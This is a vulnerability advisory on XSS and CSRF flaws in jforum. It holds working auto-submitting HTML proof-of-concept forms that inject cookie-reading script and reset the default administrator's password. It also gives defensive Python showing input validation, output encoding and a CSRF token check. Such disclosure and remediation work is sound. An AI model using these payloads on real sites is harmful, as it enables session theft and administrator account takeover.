High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jforum, which can be exploited to perform Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks.
Multiple Cross-Site Scripting (XSS) vulnerabilities in jforum: CVE-2012-6445
1.1 The vulnerability exists due to insufficient filtration of user-supplied input in the "start" HTTP POST parameter in the "jforum.page" script when sending any message. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim visits the malicious webpage.
Malicious webpage example:
<form action="http://[host]/jforum.page" method="post" name="f1">
<input type="hidden" name="action" value="insertSave" />
<input type="hidden" name="module" value="posts" />
<input type="hidden" name="preview" value="0" />
<input type="hidden" name="forum_id" value="1" />
<input type="hidden" name="start" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="topic_id" value="2" />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>
1.2 The vulnerability exists due to insufficient filtration of user-supplied input in the "action" HTTP POST parameter in the "jforum.page" script when posting a reply. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim visits the malicious webpage.
Malicious webpage example:
<form action="http://[host]/jforum.page" method="post" name="f1">
<input type="hidden" name="module" value="posts" />
<input type="hidden" name="disable_html" value="1" />
<input type="hidden" name="forum_id" value="1" />
<input type="hidden" name="message" value="123" />
<input type="hidden" name="quick" value="1" />
<input type="hidden" name="start" value="0" />
<input type="hidden" name="topic_id" value="2" />
<input type="hidden" name="action" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>
1.3 The vulnerability exists due to insufficient filtration of user-supplied input in the "returnUrl", "forum_id" and "topic_id" HTTP POST parameters in the "jforum.page" script. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website. Successful exploitation requires that the victim visits the malicious webpage.
Malicious webpage example:
<form action="http://[host]/jforum.page" method="post" name="f1">
<input type="hidden" name="action" value="doModeration" />
<input type="hidden" name="log_description" value="" />
<input type="hidden" name="log_type" value="0" />
<input type="hidden" name="module" value="moderation" />
<input type="hidden" name="topicMove" value="1" />
<input type="hidden" name="returnUrl" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="forum_id" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="topic_id" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>
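All three XSS cases above share one root cause: a POST parameter is copied back into the page's markup without being validated or encoded, so a value containing `">` closes the attribute it lands in and the rest is rendered as HTML. The following is an added example written for this advisory, not code from jforum or from High-Tech Bridge. It models the request as a dict of POST parameters and uses a constructed stand-in template to show the vulnerable pattern next to the two fixes a defender applies: an allow-list for the numeric parameters ("start", "forum_id", "topic_id"), a site-relative-path-only rule for "returnUrl", and HTML-attribute encoding of anything that is reflected. The function and constant names are the example's own.

```python
"""Added example, not jforum code: reflected-parameter XSS and its fixes.
Requests are plain dicts; the template is a constructed stand-in."""
import html
import re
from urllib.parse import urlsplit

# Constructed POST body shaped like the advisory's first PoC (payload shortened).
CONSTRUCTED_POST = {
    "action": "insertSave",
    "module": "posts",
    "forum_id": "1",
    "topic_id": "2",
    "start": '"><script>alert(1)</script>',
    "returnUrl": '"><script>alert(1)</script>',
}


def render_vulnerable(params):
    """Echo parameters straight into attribute values: the bug pattern."""
    return "".join(
        f'<input type="hidden" name="{k}" value="{v}" />\n' for k, v in params.items()
    )


def render_hardened(params):
    """Same page, but every reflected value is HTML-attribute-encoded.
    quote=True also turns '"' into &quot;, so the attribute cannot be closed early."""
    return "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}" />\n'
        for k, v in params.items()
    )


class BadParameter(ValueError):
    """Raised when a parameter fails its allow-list."""


_INT_RE = re.compile(r"^[0-9]{1,9}$")


def int_param(params, name, default=None):
    """Allow-list parse: only a short run of digits is accepted, so a payload
    is rejected before it can reach a template, a query or a redirect."""
    raw = params.get(name)
    if raw is None:
        if default is None:
            raise BadParameter(f"{name} is required")
        return default
    if not _INT_RE.match(raw):
        raise BadParameter(f"{name} must be a positive integer")
    return int(raw)


def validate_post(params):
    """Return (clean, rejected): parsed values and the names that failed."""
    clean, rejected = {}, []
    for name, default in (("forum_id", None), ("topic_id", None), ("start", 0)):
        try:
            clean[name] = int_param(params, name, default)
        except BadParameter:
            rejected.append(name)
    return clean, rejected


def safe_return_url(raw):
    """returnUrl is honoured only as a site-relative path; anything else
    (absolute URL, protocol-relative //host, markup, backslashes) becomes '/'."""
    if not raw or not raw.startswith("/") or raw.startswith("//") or "\\" in raw:
        return "/"
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc or any(c in raw for c in '<>"\''):
        return "/"
    return raw


if __name__ == "__main__":
    print(render_vulnerable(CONSTRUCTED_POST))
    print(render_hardened(CONSTRUCTED_POST))
    print(validate_post(CONSTRUCTED_POST))
    print(safe_return_url(CONSTRUCTED_POST["returnUrl"]))
```

Validation and encoding are complementary, not alternatives: the allow-list stops the payload from ever being stored or used in a redirect, while the encoding protects any template that still reflects a free-text value such as "action" or "log_description".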
Cross-Site Request Forgery (CSRF) in jforum: CVE-2012-6446
2.1 The vulnerability exists due to insufficient verification of the HTTP request origin in the "jforum.page" script. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and change the administrator's password.
The PoC (Proof-of-Concept) below will change the password to "password" for the user with id = 2 (the default administrator's ID):
<form action="http://[host]/jforum.page" method="post" name="f1">
<input type="hidden" name="action" value="editSave" />
<input type="hidden" name="module" value="adminUsers" />
<input type="hidden" name="user_id" value="2" />
<input type="hidden" name="username" value="username" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="new_password" value="password" />
<input type="hidden" name="password_confirm" value="password" />
<input type="hidden" name="viewemail" value="0" />
<input type="hidden" name="hideonline" value="0" />
<input type="hidden" name="notifyreply" value="1" />
<input type="hidden" name="notify_always" value="0" />
<input type="hidden" name="notify_text" value="0" />
<input type="hidden" name="notifypm" value="1" />
<input type="hidden" name="attachsig" value="1" />
<input type="hidden" name="allowhtml" value="1" />
<input type="hidden" name="allowbbcode" value="1" />
<input type="hidden" name="allowsmilies" value="1" />
<input type="hidden" name="rank_special" value="-1" />
<input type="submit" name="submit" value="Submit">
</form>
<script>
document.f1.submit();
</script>
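The PoC works because the browser attaches the administrator's session cookie to the auto-submitted form and the server accepts the "editSave" action on the strength of that cookie alone. The check the advisory says is missing is shown below as an added example written for this advisory, not code from jforum or from High-Tech Bridge: a per-session synchronizer token that every state-changing POST must echo back, with an Origin/Referer comparison as defence in depth. Requests are modelled as dicts with "method", "headers" and "params", the session as a dict the server controls; SITE_ORIGIN, the USERS table and the two request builders are constructed for the example, and the forged request mirrors the PoC's parameters.

```python
"""Added example, not jforum code: synchronizer-token CSRF check plus an
Origin/Referer check, in front of the adminUsers/editSave action."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://forum.example"                          # constructed
TOKEN_FIELD = "csrf_token"
USERS = {2: {"username": "admin", "password": "original"}}     # constructed


def issue_csrf_token(session):
    """Create, once per session, the secret a legitimate form must echo back.
    A page on another origin cannot read it: same-origin policy hides the response."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def _same_origin(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def csrf_ok(request, session):
    """True only if a state-changing request proves it came from this site."""
    if request["method"].upper() in ("GET", "HEAD", "OPTIONS"):
        return True                         # safe methods must not change state
    headers = request["headers"]
    # 1. Browsers attach Origin (or at least Referer) to cross-site form posts;
    #    a present-but-foreign value is an immediate reject.
    source = headers.get("Origin") or headers.get("Referer")
    if source and not _same_origin(source):
        return False
    # 2. The token is the primary control and is compared in constant time.
    expected = session.get(TOKEN_FIELD, "")
    supplied = request["params"].get(TOKEN_FIELD, "")
    return bool(expected) and hmac.compare_digest(
        expected.encode("utf-8"), supplied.encode("utf-8"))


def handle_edit_save(request, session):
    """The editSave action with the CSRF check in front of it."""
    if not csrf_ok(request, session):
        return "rejected: CSRF check failed"
    p = request["params"]
    if p.get("new_password") != p.get("password_confirm"):
        return "rejected: passwords differ"
    uid = int(p["user_id"])
    USERS[uid]["password"] = p["new_password"]
    return f"password changed for user {uid}"


def forged_request():
    """Constructed: what the PoC form above sends (no token, foreign Origin)."""
    return {"method": "POST",
            "headers": {"Origin": "https://attacker.example"},
            "params": {"action": "editSave", "module": "adminUsers",
                       "user_id": "2", "new_password": "password",
                       "password_confirm": "password"}}


def legitimate_request(session):
    """Constructed: what the site's own admin form sends."""
    return {"method": "POST",
            "headers": {"Origin": SITE_ORIGIN},
            "params": {"action": "editSave", "module": "adminUsers",
                       "user_id": "2", "new_password": "newpass",
                       "password_confirm": "newpass",
                       TOKEN_FIELD: issue_csrf_token(session)}}


if __name__ == "__main__":
    session = {}
    print(handle_edit_save(forged_request(), session))
    print(handle_edit_save(legitimate_request(session), session))
```

The token check is the control that matters: the Origin/Referer comparison is cheap and catches the plain cross-site form post, but some clients omit both headers, so their absence must fall through to the token rather than be treated as proof of same-site origin. Rendering the token into every state-changing form and rejecting any POST without it closes the "editSave" case and every other module the same way.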